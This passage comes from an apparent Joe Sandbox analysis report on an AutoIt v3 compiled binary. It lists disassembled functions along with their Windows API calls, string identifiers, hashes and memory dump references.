                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                  • String ID: AutoIt v3 GUI
                                                                  • API String ID: 1458621304-248962490
                                                                  • Opcode ID: 52a41b345509e3143c0282b4fad00aa69b8710f3b8620b33e896e175bd954027
                                                                  • Instruction ID: bf0dc746aa58199e3b7fa603fd558b6333778abc91f6a2f6315a7474aa9f484c
                                                                  • Opcode Fuzzy Hash: 52a41b345509e3143c0282b4fad00aa69b8710f3b8620b33e896e175bd954027
                                                                  • Instruction Fuzzy Hash: 03B19C71A1420AEFDB14DFA8DD95BBE7BB5FB08310F104229FA15E72A0DB74A850DB50
                                                                  Function 0094A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0094A47A
                                                                  • __swprintf.LIBCMT ref: 0094A51B
                                                                  • _wcscmp.LIBCMT ref: 0094A52E
                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0094A583
                                                                  • _wcscmp.LIBCMT ref: 0094A5BF
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0094A5F6
                                                                  • GetDlgCtrlID.USER32(?), ref: 0094A648
                                                                  • GetWindowRect.USER32(?,?), ref: 0094A67E
                                                                  • GetParent.USER32(?), ref: 0094A69C
                                                                  • ScreenToClient.USER32(00000000), ref: 0094A6A3
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0094A71D
                                                                  • _wcscmp.LIBCMT ref: 0094A731
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0094A757
                                                                  • _wcscmp.LIBCMT ref: 0094A76B
                                                                    • Part of subcall function 0091362C: _iswctype.LIBCMT ref: 00913634
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                  • String ID: %s%u
                                                                  • API String ID: 3744389584-679674701
                                                                  • Opcode ID: cba9b97284c52d0361b03be4d6129c738696ac52b220f02661d8c29edb1344d8
                                                                  • Instruction ID: b98058edb9046261738bc9f87dd5c6995f1d7bc8898b2273899cd2cce1a4d447
                                                                  • Opcode Fuzzy Hash: cba9b97284c52d0361b03be4d6129c738696ac52b220f02661d8c29edb1344d8
                                                                  • Instruction Fuzzy Hash: 8BA1D071644306AFDB29DF60C884FAAB7ECFF84354F008629F999D2190DB34E945CB92
                                                                  Function 0094AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0094AF18
                                                                  • _wcscmp.LIBCMT ref: 0094AF29
                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0094AF51
                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 0094AF6E
                                                                  • _wcscmp.LIBCMT ref: 0094AF8C
                                                                  • _wcsstr.LIBCMT ref: 0094AF9D
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0094AFD5
                                                                  • _wcscmp.LIBCMT ref: 0094AFE5
                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0094B00C
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0094B055
                                                                  • _wcscmp.LIBCMT ref: 0094B065
                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0094B08D
                                                                  • GetWindowRect.USER32(00000004,?), ref: 0094B0F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                  • String ID: @$ThumbnailClass
                                                                  • API String ID: 1788623398-1539354611
                                                                  • Opcode ID: 4faee55aa6f6cb1c45b2fd5fe4c93f8d4a4c48baecfd99c6a7d353bb600fb134
                                                                  • Instruction ID: b20017b318574e47736bc9c41ee6c81a04ba61f6ca95219b8c0ab4dafd6788f1
                                                                  • Opcode Fuzzy Hash: 4faee55aa6f6cb1c45b2fd5fe4c93f8d4a4c48baecfd99c6a7d353bb600fb134
                                                                  • Instruction Fuzzy Hash: 0A81A1721082099FDB05DF14C891FAA7BECFF84714F048469FD899A095DB34DD89CB61
                                                                  Function 0094ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                  • API String ID: 1038674560-1810252412
                                                                  • Opcode ID: 8fbb265e90a2d5e1b93f26cf61b0ce93db5d9dbff8b6afec40be7f152475be37
                                                                  • Instruction ID: dd9903a6e4858283c4d945ff5e9c7759cfc63477e03560846612140964686644
                                                                  • Opcode Fuzzy Hash: 8fbb265e90a2d5e1b93f26cf61b0ce93db5d9dbff8b6afec40be7f152475be37
                                                                  • Instruction Fuzzy Hash: F9319031A8820DBAEB14FBB4DE43FFEB768AB61715F600419B552B10D1EE616F04C692
                                                                  Function 00964FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00965013
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0096501E
                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00965029
                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00965034
                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 0096503F
                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 0096504A
                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00965055
                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00965060
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 0096506B
                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00965076
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00965081
                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0096508C
                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00965097
                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 009650A2
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 009650AD
                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 009650B8
                                                                  • GetCursorInfo.USER32(?), ref: 009650C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Load$Info
                                                                  • String ID:
                                                                  • API String ID: 2577412497-0
                                                                  • Opcode ID: 56a410b6f67722c1864a2173ba9ebb65fafa468cc4623d99389f286088c02712
                                                                  • Instruction ID: e652186b534b63bb9b04a6303bfa3f3a53b0c3f2f490848a4a9d18d2e236d2b4
                                                                  • Opcode Fuzzy Hash: 56a410b6f67722c1864a2173ba9ebb65fafa468cc4623d99389f286088c02712
                                                                  • Instruction Fuzzy Hash: 9831D2B1D4831D6ADF209FB68C8996EBFE8FF04750F51453AE54DE7280DA78A5008F91
                                                                  Function 0097A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0097A259
                                                                  • DestroyWindow.USER32(?,?), ref: 0097A2D3
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0097A34D
                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0097A36F
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0097A382
                                                                  • DestroyWindow.USER32(00000000), ref: 0097A3A4
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008F0000,00000000), ref: 0097A3DB
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0097A3F4
                                                                  • GetDesktopWindow.USER32 ref: 0097A40D
                                                                  • GetWindowRect.USER32(00000000), ref: 0097A414
                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0097A42C
                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0097A444
                                                                    • Part of subcall function 008F25DB: GetWindowLongW.USER32(?,000000EB), ref: 008F25EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                  • String ID: 0$tooltips_class32
                                                                  • API String ID: 1297703922-3619404913
                                                                  • Opcode ID: 338f9015f84c26cf02a5e09bc0792ae1030b9aba0f026497a0173ae0c2dc4028
                                                                  • Instruction ID: 4f93383ad327e34cfc068486e18cef882384eda2cc518b98f54f2649a3945d38
                                                                  • Opcode Fuzzy Hash: 338f9015f84c26cf02a5e09bc0792ae1030b9aba0f026497a0173ae0c2dc4028
                                                                  • Instruction Fuzzy Hash: A171DD72154204AFD725DF28CC48F6A7BE9FB88704F04892DF9899B2B0C771E942DB52
                                                                  Function 0097C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • DragQueryPoint.SHELL32(?,?), ref: 0097C627
                                                                    • Part of subcall function 0097AB37: ClientToScreen.USER32(?,?), ref: 0097AB60
                                                                    • Part of subcall function 0097AB37: GetWindowRect.USER32(?,?), ref: 0097ABD6
                                                                    • Part of subcall function 0097AB37: PtInRect.USER32(?,?,0097C014), ref: 0097ABE6
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0097C690
                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0097C69B
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0097C6BE
                                                                  • _wcscat.LIBCMT ref: 0097C6EE
                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0097C705
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0097C71E
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0097C735
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0097C757
                                                                  • DragFinish.SHELL32(?), ref: 0097C75E
                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0097C851
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                  • API String ID: 169749273-3440237614
                                                                  • Opcode ID: 42d3deb43599d5001f49a609660531ddca5963619a056b74d55a06acabb76a5d
                                                                  • Instruction ID: ad1628297b8714b6f15bb8ec8d4e2117103482fb2ee13d251a74443ddb32e059
                                                                  • Opcode Fuzzy Hash: 42d3deb43599d5001f49a609660531ddca5963619a056b74d55a06acabb76a5d
                                                                  • Instruction Fuzzy Hash: A7616F72108305AFC701EF64DC85EAFBBE8FF89754F00492EF695921A1DB709A49CB52
                                                                  Function 00974392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00974424
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0097446F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                  • API String ID: 3974292440-4258414348
                                                                  • Opcode ID: 66b28eacefb7d9449d403dd46d35f2169f05288dc0cff8fa722d9202610cc864
                                                                  • Instruction ID: 6238d999ec55538d1476f3cc9e0f1851cc9da976f7b84460269a392c0f1feec6
                                                                  • Opcode Fuzzy Hash: 66b28eacefb7d9449d403dd46d35f2169f05288dc0cff8fa722d9202610cc864
                                                                  • Instruction Fuzzy Hash: 3B9159712043059BCB14EF24C451B6EB7E5BF96354F048868F89A9B3A2CB35ED49CB82
                                                                  Function 0097B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0097B8B4
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009791C2), ref: 0097B910
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0097B949
                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0097B98C
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0097B9C3
                                                                  • FreeLibrary.KERNEL32(?), ref: 0097B9CF
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0097B9DF
                                                                  • DestroyIcon.USER32(?,?,?,?,?,009791C2), ref: 0097B9EE
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0097BA0B
                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0097BA17
                                                                    • Part of subcall function 00912EFD: __wcsicmp_l.LIBCMT ref: 00912F86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                  • String ID: .dll$.exe$.icl
                                                                  • API String ID: 1212759294-1154884017
                                                                  • Opcode ID: b2646d901e8201da6fe3b5026440e7073e1fd6f5d3935d6653a1dbdf78a3d1a7
                                                                  • Instruction ID: 94c2732fb9d1f504b189733e7ae1ad3f353abfd6b413f6b25dc880f8f437c2d6
                                                                  • Opcode Fuzzy Hash: b2646d901e8201da6fe3b5026440e7073e1fd6f5d3935d6653a1dbdf78a3d1a7
                                                                  • Instruction Fuzzy Hash: 2961DF72A44219BAEB14DF64CC42FFE7BACFB08714F108515FA29E61D0DB749990DBA0
                                                                  Function 0095DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?), ref: 0095DCDC
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0095DCEC
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0095DCF8
                                                                  • __wsplitpath.LIBCMT ref: 0095DD56
                                                                  • _wcscat.LIBCMT ref: 0095DD6E
                                                                  • _wcscat.LIBCMT ref: 0095DD80
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0095DD95
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095DDA9
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095DDDB
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095DDFC
                                                                  • _wcscpy.LIBCMT ref: 0095DE08
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0095DE47
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                  • String ID: *.*
                                                                  • API String ID: 3566783562-438819550
                                                                  • Opcode ID: 90568cb2812c7f09bd12b6fc087013e16c977b70decdcf2d2737117ca500f489
                                                                  • Instruction ID: c9b85244f256308377dfac7d2f715b46a5bf2baaf89f1977b26452b2802b4934
                                                                  • Opcode Fuzzy Hash: 90568cb2812c7f09bd12b6fc087013e16c977b70decdcf2d2737117ca500f489
                                                                  • Instruction Fuzzy Hash: 59616C725042099FCB20EF25C845EAEB3E8FF89314F04492DF999D7251EB31E949CB92
                                                                  Function 00959C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00959C7F
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00959CA0
                                                                  • __swprintf.LIBCMT ref: 00959CF9
                                                                  • __swprintf.LIBCMT ref: 00959D12
                                                                  • _wprintf.LIBCMT ref: 00959DB9
                                                                  • _wprintf.LIBCMT ref: 00959DD7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 311963372-3080491070
                                                                  • Opcode ID: e400dac534a3da1cf9839b2ee983406d22b00121b86ee7734818a3da2729a57c
                                                                  • Instruction ID: 2c151221ff4dbbcbd243c24cd6d98a7b879f27f4eb84a0d58a8b25c92f252d5a
                                                                  • Opcode Fuzzy Hash: e400dac534a3da1cf9839b2ee983406d22b00121b86ee7734818a3da2729a57c
                                                                  • Instruction Fuzzy Hash: CC519D3290050DAAEF15EBB4DD56EFEBB78FF14300F500165BA09B20A1EB352E58DB61
                                                                  Function 0095A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0095A3CB
                                                                  • GetDriveTypeW.KERNEL32 ref: 0095A418
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0095A460
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0095A497
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0095A4C5
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                  • API String ID: 2698844021-4113822522
                                                                  • Opcode ID: 3d8e6a06c1cdc1576d130b343287a6dcd3b9c675869462afd537edc86416ea0e
                                                                  • Instruction ID: 00d6c71a81418e548f9b75e14173f4dbd651ca2c1ea2407410065883273ff3ca
                                                                  • Opcode Fuzzy Hash: 3d8e6a06c1cdc1576d130b343287a6dcd3b9c675869462afd537edc86416ea0e
                                                                  • Instruction Fuzzy Hash: B2517D711143089FC700EF24C89596BB7E8FF85758F00896DF88997261DB71ED09CB92
                                                                  Function 0094F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0092E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0094F8DF
                                                                  • LoadStringW.USER32(00000000,?,0092E029,00000001), ref: 0094F8E8
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • GetModuleHandleW.KERNEL32(00000000,009B5310,?,00000FFF,?,?,0092E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0094F90A
                                                                  • LoadStringW.USER32(00000000,?,0092E029,00000001), ref: 0094F90D
                                                                  • __swprintf.LIBCMT ref: 0094F95D
                                                                  • __swprintf.LIBCMT ref: 0094F96E
                                                                  • _wprintf.LIBCMT ref: 0094FA17
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0094FA2E
                                                                  Strings
                                                                  Memory Dump Source
